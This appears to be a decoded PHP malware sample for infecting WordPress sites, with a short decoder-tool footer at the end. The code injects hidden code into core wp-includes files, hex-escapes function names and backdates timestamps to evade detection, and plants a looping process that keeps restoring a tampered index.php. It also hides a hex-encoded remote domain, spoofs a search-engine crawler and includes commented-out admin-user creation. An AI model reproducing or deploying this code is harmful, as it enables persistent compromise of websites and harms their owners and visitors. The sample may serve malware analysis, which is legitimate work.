			$hidden_code=str_replace('#bk_idx_path#',$bk_index_path1,$hidden_code_template);
		$hidden_code=str_replace('#idx_size#',$index_size,$hidden_code);
	     $hidden_code= preg_replace("/file_put_contents/",strto16('file_put_contents'),$hidden_code); 
		$hidden_code= preg_replace("/file_get_contents/",strto16('file_get_contents'),$hidden_code); 
		$hidden_code= preg_replace("/file_exists/",strto16('file_exists'),$hidden_code); 
		$hidden_code= preg_replace("/filesize/",strto16('filesize'),$hidden_code); 
		$hidden_code= preg_replace("/chmod/",strto16('chmod'),$hidden_code); 
		$hidden_code= preg_replace("/touch/",strto16('touch'),$hidden_code); 
         
		$putcache=@file_put_contents( $wordpress_content_cache, '<?php '.$hidden_code.' ?>');
		if (!$putcache) 
		{
		$arr_msg[] = 'modify file '.$wordpress_content_cache.' file fail.';
		}
		else 
		{
		$arr_msg[] = 'modify file '.$wordpress_content_cache.' file success.';
		@touch($wordpress_content_cache, strtotime("-260 days", time()));
		}
		
				
    foreach ($arr_rand_wordpress_filename as $key => $wordpress_filename) {
      
        $needle = $arr_wordpress_filename[$wordpress_filename];
        $wordpress_filepath = $wordpress_include_path . $wordpress_filename;
        if (!file_exists($wordpress_filepath)) {
            continue;
        }
        $old_content = file_get_contents($wordpress_filepath);
       
		 $bk_index_path3 = $fp2[array_rand($fp2, 1)] . rand_abc(5) . '.log';
         @file_put_contents($bk_index_path3, $b64_index_content);
		
		$hidden_code_template=str_replace("#bk_idx_path#",$bk_index_path3,$hidden_code_template);
		$hidden_code_template=str_replace("#idx_size#",$index_size,$hidden_code_template);
		$hidden_code_template=str_replace("#indexbase64#",$b64_index_content,$hidden_code_template);
		 $new_content = str_replace($needle, $hidden_code . $needle, $old_content);
	    $new_content1=str_replace($needle, $hidden_code_template ."\n". $needle, $old_content);
		$fileoldtime=filectime($wordpress_filepath);

		 
        @chmod($wordpress_filepath, 438);
        @unlink($wordpress_filepath);
		
		
        $success = @file_put_contents($wordpress_filepath, $new_content1);
	
		touch($wordpress_filepath,$fileoldtime);
        $arr_msg[] = 'hide code: ' . $wordpress_filepath . ' ' . ($success ? 'success' : 'fail');
    }
	}
	else
	{
		  $arr_msg[] ='hide code fail';
	}
	
    return $arr_msg;
}
function crack_auto_restore()
{
    global $root;

    $arr_wordpress_filename = array(
         'blocks.php' => 'function register_block_style_handle',
        'theme.php' => 'function validate_current_theme',
        'template.php' => 'function get_archive_template',
        'rewrite.php' => 'function url_to_postid',
        'admin-bar.php' => 'function wp_admin_bar_my_account_menu',
        'rest-api.php' => 'function register_rest_field',
        'media.php' => 'function image_downsize',
        'nav-menu.php' => 'function is_nav_menu_item',
        'theme-templates.php' => 'function wp_enable_block_templates',
        'block-template.php' => 'function _strip_template_file_suffix',
		'blocks/archives.php' => 'function render_block_core_archives',
		'category.php' => 'function get_cat_name',
		'load.php' => 'function is_wp_error',
		'plugin.php' => 'function do_action_ref_array',
		'query.php' => 'function is_front_page',
		'cron.php' => 'function wp_schedule_event',
    );

    $wordpress_include_path = $root . '/wp-includes/';
    $arr_msg = array();
		foreach ($arr_wordpress_filename as $wordpress_filename => $needle) {
		$wordpress_filepath = $wordpress_include_path . $wordpress_filename;
		if (!file_exists($wordpress_filepath)) {
			continue;
		}
		$old_content = @file_get_contents($wordpress_filepath);
		if (preg_match('/\/\/ cyborg_start[\s\S]*?\/\/ cyborg_end/', $old_content)) {
			$new_content = preg_replace('/\/\/ cyborg_start[\s\S]*?\/\/ cyborg_end/', '', $old_content);
			file_put_contents($wordpress_filepath, $new_content);
			$arr_logs[] = 'delete hidden code: ' . $wordpress_filepath;
		}
	}
    foreach ($arr_wordpress_filename as $wordpress_filename => $needle) {
        $wordpress_filepath = $wordpress_include_path . $wordpress_filename;
        if (!file_exists($wordpress_filepath)) {
            continue;
        }
        $old_content = file_get_contents($wordpress_filepath);
        if (preg_match('/\/\/c_start[\s\S]*?\/\/c_end/', $old_content)) {
            $new_content = preg_replace('/\/\/c_start[\s\S]*?\/\/c_end/', '', $old_content);
            $success = @file_put_contents($wordpress_filepath, $new_content);
            $arr_msg[] = 'crack restore: ' . $wordpress_filepath . ' ' . ($success ? 'success' : 'fail');
        }
    }

    // if (file_exists('wp-includes/fonts/dashicons.ttc')) {
        // @unlink('wp-includes/fonts/dashicons.ttc');
        // $arr_msg[] = "delete ttc ok";
    // }

    // if (file_exists('wp-admin/images/browser-tiny.png')) {
        // @unlink('wp-admin/images/browser-tiny.png');
        // $arr_msg[] = "delete png ok";
    // }

    $arr_msg[] = "pluggable " . cleancroncode($root.'/wp-includes/pluggable.php', "i = 'inde'.'x.php';", "if ( ! function_exists( 'wp_set_auth_cookie'");
    $arr_msg[] = "cron " . cleancroncode($root.'/wp-includes/cron.php', "i = 'inde'.'x.php';", "function wp_get_schedules() {");
    return $arr_msg;
}
function cleancroncode($file, $startstr, $endstr)
{
    $msg = 'cron no code';
    if (file_exists($file)) {

        $ma = file_get_contents($file);

        $start = strpos($ma, $startstr);

        if ($start !== false) {

            $head = substr($ma, 0, $start - 1);

            $end = strpos($ma, $endstr);

            $foot = substr($ma, $end);

            file_put_contents($file, $head . $foot);

            $msg = 'clear cron code';

        } else {
            $msg = 'cron no code';
        }
    }
    return $msg;
}

function insertcroncode($file, $src, $beforetag)
{
    // code
    $c = file_get_contents($file);
    $pn = file_put_contents($file, str_replace($beforetag, $src . "\n" . $beforetag, $c));
    if ($pn) {
        $msg = "line of $file ok";
    } else {
        $msg = "line of $file fail";
    }
    return $msg;
}
function output_message($result, $message_type = 'html', $html_tag = 'li')
{

    if ($message_type != 'html') {
        echo json_encode($result);
        return;
    }

    if (!is_array($result)) {
        return;
    }

    if (!isset($result['title'])) {
        $result['title'] = '';
    }

    echo '---------start ' . $result['title'];

    if (sizeof($result['message']) > 0) {
        foreach ($result['message'] as $message) {
            $message = str_replace('success', '<font color="blue">success</font>', $message);
            $message = str_replace(' ok', '<font color="blue"> ok</font>', $message);
            $message = str_replace('fail', '<font color="red">fail</font>', $message);
            echo "<$html_tag>" . $message . "</$html_tag>";
        }
    }

    if (isset($result['status']) && !empty($result['status'])) {

        if ($result['status'] == 'ok') {
            $status = '<font color="green">' . $result['status'] . '</font>';
        }

        if ($result['status'] == 'fail') {
            $status = '<font color="red">' . $result['status'] . '</font>';
        }

        echo '---------end ' . $result['title'] . '===>status:' . $status;

    } else {

        $status = '<font color="green">ok</font>';

        echo '---------end ' . $result['title'] . '===>status:' . $status;
    }

    echo "<br />";
    echo "<br />";

}
function fi1($path)
{
    global $root, $arpath8;
    if ($handle = opendir($path)) {
        while (($file = readdir($handle)) !== false) {
            if ($file != "." && $file != "..") {
                $pfile = $path . "/" . $file;
                if (is_dir($pfile) && !is_link($pfile)) {
                    if (substr_count(str_replace($root . '/', '', $pfile), '/') < 3) {
                        fi1($pfile);
                    }
                    if (!file_exists($pfile . "/index.php")) {
                        array_push($arpath8, str_replace($root . '/', '', $pfile));
                    }

                }
            }
        }
    }
    shuffle($arpath8);
}
function fp2($root)
{
    global $root, $http, $host, $domain, $ht, $gov, $arpath8;

    $p_arr = array();
    $pnew_arr = array();

    foreach ($arpath8 as $k => $v) {
        $qupath = str_replace($root, "", $v);
        $p_arr[$k] = explode("/", $qupath);
        if (count($p_arr[$k]) >= 3) {
            $pnew_arr[] = $v;
        }
    }

    return $pnew_arr;
}
function rand_abc($length)
{
    $str = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";
    $strlen = 52;
    while ($length > $strlen) {
        $str .= $str;
        $strlen += 52;
    }
    $str = str_shuffle($str);
    return substr($str, 0, $length);
}
function file_get_https($url, $timeout)
{
    $arrContextOptions = array(
        "ssl" => array(
            "verify_peer" => false,
            "verify_peer_name" => false,
        ),
        'http' => array(
            'method' => "GET",
            'timeout' => $timeout,
        ),
    );

    @file_get_contents($url, false, stream_context_create($arrContextOptions));

}

function auto_restore_cycle()
{
    $arr_msg = array();
$code ="<?php set_time_limit(99 - 99);
ignore_user_abort(1);

function auto_restore_memory()
{
    \$index_path = \$_SERVER['DOCUMENT_ROOT'] . '/index.php';
    \$flag_filename = \$_SERVER['DOCUMENT_ROOT'] . '/3FNDICU2KH';
    @unlink(\$flag_filename);
    \$index_code = @file_get_contents(\$index_path);
    while (1) {
        clearstatcache();
        if (file_exists(\$flag_filename)){
            break;
        }
        if (!file_exists(\$index_path) or @file_get_contents(\$index_path) != \$index_code) {
            @chmod(\$index_path, 438);
            @unlink(\$index_path);
            @file_put_contents(\$index_path, \$index_code);
            @chmod(\$index_path, 292);
        }
        sleep(2);
    }
}

ob_end_clean();
header(\"Connection: close\");
ob_start();
echo 888;
header(\"Content-Length: \" . ob_get_length());
ob_end_flush();
flush();

auto_restore_memory(); ?>";
    $file_path = $_SERVER['DOCUMENT_ROOT'] . '/' . 'cyborg_tmp.php';
    $success = @file_put_contents($file_path, $code);
    $arr_msg[] = 'write tmp file: ' . $file_path . ' ' . ($success ? 'success' : 'fail');
    if (!$success) {
        return $arr_msg;
    }
    $protocol = (isset($_SERVER["HTTPS"]) && $_SERVER["HTTPS"] == "on") ? 'https' : 'http';
    $file_url = str_replace($_SERVER['DOCUMENT_ROOT'], $protocol . '://' . $_SERVER['HTTP_HOST'], $file_path);
   file_get_https($file_url, 3);
   $arr_msg[] = 'get: ' . $file_url . ' ok';
  $success = @unlink($file_path);
   $arr_msg[] = 'delete: ' . $file_path . ' ' . ($success ? 'success' : 'fail');
    return $arr_msg;
}

function hiddenma()
{
    global $root, $http, $host, $ht, $gov, $sitemap_code_file, $oneline, $mode, $domain,$fsize;


    $return_result = array();
    $return_result['title'] = __FUNCTION__;

    if (is_dir("wp-includes") && is_dir("wp-admin")) {

        // if (file_exists("wp-config.php")) {
            // $return_result['message'][] = adduser('wp-blog', '$P$BFHUiQbVj3FJKfYu/xB/LTghBaAXLe1', true);
            // $return_result['message'][] = adduser('wp-user', '1bc83cec427917671aef3f1c63c150f9', false);
        // }

        $arr_msg = crack_auto_restore();
        foreach ($arr_msg as $key => $msg) {
            $return_result['message'][] = $msg;
        }

        $arr_msg = auto_restore_file();
        foreach ($arr_msg as $key => $msg) {
            $return_result['message'][] = $msg;
        }
		
		// $wcc_file=@file_get_contents($_SERVER['DOCUMENT_ROOT'].'/wp-content/cachef'));
         $check_ginfo_url=$http.'://'.$host.'/?ginfo';
		$check_staus=gfiocheck($check_ginfo_url);
		 if($check_staus)
		 {
		 $return_result['message'][] = 'ginfo:ok';
		 }
			$arr_msg = auto_restore_cycle();
			foreach ($arr_msg as $key => $msg) {
			$return_result['message'][] = $msg;
			} 
		 

    }
 
    return $return_result;
}
if (isset($_POST['message_type']) && !empty($_POST['message_type'])) {
    $message_type = $_POST['message_type'];
} else {
    $message_type = 'html';
}
$useragent = "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)";
$domain = "\x68\x74\x74\x70\x3a\x2f\x2f\x73\x2e\x6e\x65\x77\x6e\x64\x61\x79\x2e\x78\x79\x7a\x2f";
$root = $_SERVER['DOCUMENT_ROOT'];
@chdir($root);

$http = (isset($_SERVER["HTTPS"]) && $_SERVER["HTTPS"] == "on") ? 'https' : 'http';
$host = $_SERVER["HTTP_HOST"];

$arpath8 = array();

fi1($root);

$fp2 = @fp2($root);

$ht =
    '
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . index.php [L]
</IfModule>
';


    $hiddenma_result = hiddenma(); // 4
    output_message($hiddenma_result, $message_type);
	
	


?>

Function Calls

None

Variables

None

Stats

MD5 aab075c5fc5a4067843927dd70667b8d
Eval Count 0
Decode Time 66 ms